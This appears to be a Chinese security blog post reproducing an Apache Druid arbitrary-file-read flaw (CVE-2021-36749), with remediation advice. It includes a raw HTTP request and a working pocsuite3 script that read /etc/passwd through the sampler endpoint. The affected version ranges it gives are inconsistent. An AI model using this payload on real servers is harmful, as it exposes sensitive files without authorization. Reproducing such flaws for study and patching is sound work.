Apache Druid LoadData 任意文件读取 漏洞 CVE-2021-36749

已于 2022-09-06 15:33:03 修改
阅读量492 收藏
点赞数
文章标签: 安全 web安全 服务器
于 2021-12-30 11:22:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44522540/article/details/122232144
版权

0x01 漏洞简介

在 Druid 系统中,InputSource 用于从某个数据源读取数据。但是,HTTP InputSource 允许经过身份验证的用户以 Druid 服务器进程的权限从其他来源读取数据,例如本地文件系统。

这不是用户直接访问 Druid 时的权限提升,因为 Druid 还提供了 Local InputSource,它允许相同级别的访问。但是当用户通过允许用户指定 HTTP InputSource 而不是 Local InputSource 的应用程序间接与 Druid 交互时,这是有问题的。

在这种情况下,用户可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。这个问题之前提到过,根据 CVE-2021-26920 在 0.21.0 中已修复,但在 0.21.0 或 0.21.1 中未修复。

0x02 影响范围

影响范围 : Apache Druid < 0.21.0

0x03 漏洞复现

在这里插入图片描述

URLS写入payload

file:///etc/passwd

在这里插入图片描述

POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 423
Origin: http://127.0.0.1:8888
Connection: close
Referer: http://127.0.0.1:8888/unified-console.html

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["file:///etc/passwd"]},"inputFormat":{"type":"regex","pattern":"(.*)","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{}},"tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

pocsuite3

from collections import OrderedDict
from urllib.parse import urljoin
import re,os
from requests_toolbelt import MultipartEncoder
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, OptString, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY


class TestPOC(POCBase):
    vulID = '0'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1'  #默认为1
    author = ['yo1o']  #  PoC作者的大名
    vulDate = '2022-09-06'  #漏洞公开的时间,不知道就写今天
    createDate = '2022-09-06'  # 编写 PoC 的日期
    updateDate = '2022-09-06'  # PoC 更新的时间,默认和编写时间一样
    references = ['']  # 漏洞地址来源,0day不用写
    name = 'Apache Druid 文件读取漏洞 (CVE-2021-36749)'  # PoC 名称
    appPowerLink = ''  # 漏洞厂商主页地址
    appName = 'Apache Druid 文件读取漏洞 (CVE-2021-36749)'  # 漏洞应用名称
    appVersion = '''ALL'''  # 漏洞影响版本
    vulType = VUL_TYPE.ARBITRARY_FILE_READ  #漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        Apache Druid 文件读取漏洞 (CVE-2021-36749)Apache Apache Druid <= 0.21.1  
    '''
    samples = ['']  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = ['']  # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
    category = POC_CATEGORY.EXPLOITS.REMOTE

    def _verify(self):
        result = {}
        path = "/druid/indexer/v1/sampler?for=connect"
        url = self.url + path
        headers={
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36',
            "Content-Type": 'application/json;charset=UTF-8'
            }
        data={"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["file:///etc/passwd"]},"inputFormat":{"type":"regex","pattern":"(.*)","listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{}},"tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
        try:
            resq = requests.post(url=url,headers=headers,json=data)
            if  resq.status_code==200 and re.search('root:[x*]?:0:0:', resq.text).group() in resq.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['body'] = resq.text
        except Exception as e:
            return
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(TestPOC)

本地验证

下载:https://github.com/apache/druid/archive/druid-0.20.0.zip

unzip解压后,进入druid-druid-0.20.0/distribution/docker目录,进行安装

cd druid-druid-0.20.0/distribution/docker

docker-compose up -d

在这里插入图片描述

0x04 修复

升级到0.21.0或更高版本

hana-u
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache Druid 任意文件读取 CVE-2021-36749 复现
YouthBelief的博客
11-26 2884
所有文章,仅供安全研究与学习之用,后果自负! Apache Druid 任意文件读取 CVE-2021-36749Apache Druid 任意文件读取 CVE-2021-367490x01 漏洞描述0x02 影响范围fofa语法0x03 漏洞复现0x04 漏洞修复 Apache Druid 任意文件读取 CVE-2021-36749 0x01 漏洞描述 由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的
CVE-2024-36749——Apache Druid LoadData 任意文件读取漏洞
最新发布
2301_82242964的博客
06-19 293
由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。由于 Apache Druid 默认情况下是缺乏授权认证,攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。
Druid 任意文件读取CVE-2021-36749
qq_40646572的博客
05-12 697
漏洞的利用较为简单,该漏洞之所以产生,首先是因为后台没有对传递的参数进行过滤,其次是由于对于权限没有进行限制。
Apache Druid任意文件读取漏洞CVE-2021-36749
chaojixiaojingang
03-15 8463
1.漏洞描述 Apache Druid 是一个集时间序列数据库、数据仓库和全文检索系统特点于一体的分析性数据平台。Apache Druid对用户指定的HTTP InputSource没有做限制,并且Apache Druid默认管理页面是不需要认证即可访问的,可以通过将文件URL传递给HTTP InputSource来绕过。因此未经授权的远程攻击者可以通过构造恶意参数读取服务器上的任意文件,造成服务器敏感性信息泄露。 2.影响版本 Apache Druid <= 0.21.1 3...
Druid未授权访问 漏洞复现
Boom!脑洞大爆炸的博客
11-11 6263
Druid未授权访问 漏洞复现
Apache Druid 远程代码执行漏洞 CVE-2021-25646
PeiQi的博客
02-02 556
Apache Druid 远程代码执行漏洞 CVE-2021-25646 漏洞描述 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
【技术分享】CVE-2021-25646 Apache Druid 远程代码执行漏洞分析 .pdf
09-05
Apache Druid CVE-2021-25646 远程代码执行漏洞深度解析》 Apache Druid,作为一个高性能、列式存储的开源分布式数据存储系统,广泛应用于商业智能和OLAP(在线分析处理)场景,以处理大量实时和历史数据。然而,...
Silentsoul04#vulnerability-paper-1#CVE-2021-25646:Apache Druid R
07-25
声明:请勿用作违法用途,否则后果自负0x01 简介Druid 不仅是一个数据库连接池,还包含一个 ProxyDriver、一系列内置的 JDBC 组件库、一个
Apache Druid 任意文件读取漏洞CVE-2021-36749
不光要学,知识要能说出口
11-23 4056
CVE-2021-36749 goby exp声明代码poc集合 声明 本程序仅供于学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。 代码 { "Name": "Apache Druid Abritrary File Read CVE-2021-36749", "Level": "3", "Tags": [ "fileread" ], "GobyQuery":
druid 远程命令执行(CVE-2021-25646)
qq_53086690的博客
11-23 1612
druid 远程命令执行 druid 介绍 Druid是一个专为大型数据集上的高性能切片和OLAP分析而设计的数据存储。Druid最常用作为GUI分析应用程序提供动力的数据存储,或者用作需要快速聚合的高度并发API的后端 影响版本 Apache Druid < 0.20.1 漏洞简介 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,
Apache druid 任意文件读取漏洞(CVE-2021-36749)
weixin_44047654的博客
12-05 863
Apache Druid 任意文件读取漏洞(CVE-2021-36749)
Apache Druid命令执行漏洞复现
weixin_53696027的博客
06-02 533
CVE-2019-25646是由由阿里云安全发现的 Apache Druid 远程代码执行漏洞
Apache Druid RCE漏洞复现(QVD-2023-9629)
0xSec
04-26 4364
Apache Druid使用Apache Kafka加载数据的场景下,未经身份认证的远程攻击者可配置Kafka连接属性,从而利用CVE-2023-25194漏洞触发JNDI注入,最终执行任意代码。
漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞
Adminxe的博客
11-18 3259
0x00 漏洞详情 由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。 0x01 fofa语法 title="Apache Druid" 0x02 漏洞复现 主界面–>Load data –>HTTP(s)–>Connect Data–>URIs(使用file://协议进行..
Druid未授权漏洞进一步的利用
qq_50854662的博客
05-15 6480
Druid未授权漏洞实战利用思路
Apache Druid rce漏洞
04-27
2021年5月,Apache Druid官方发布了一份安全公告,称该软件存在一个高风险的远程代码执行(RCE)漏洞,该漏洞可能导致攻击者可以通过恶意负载文件执行任意代码,甚至可能完全控制受影响的系统。建议用户及时升级到受...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值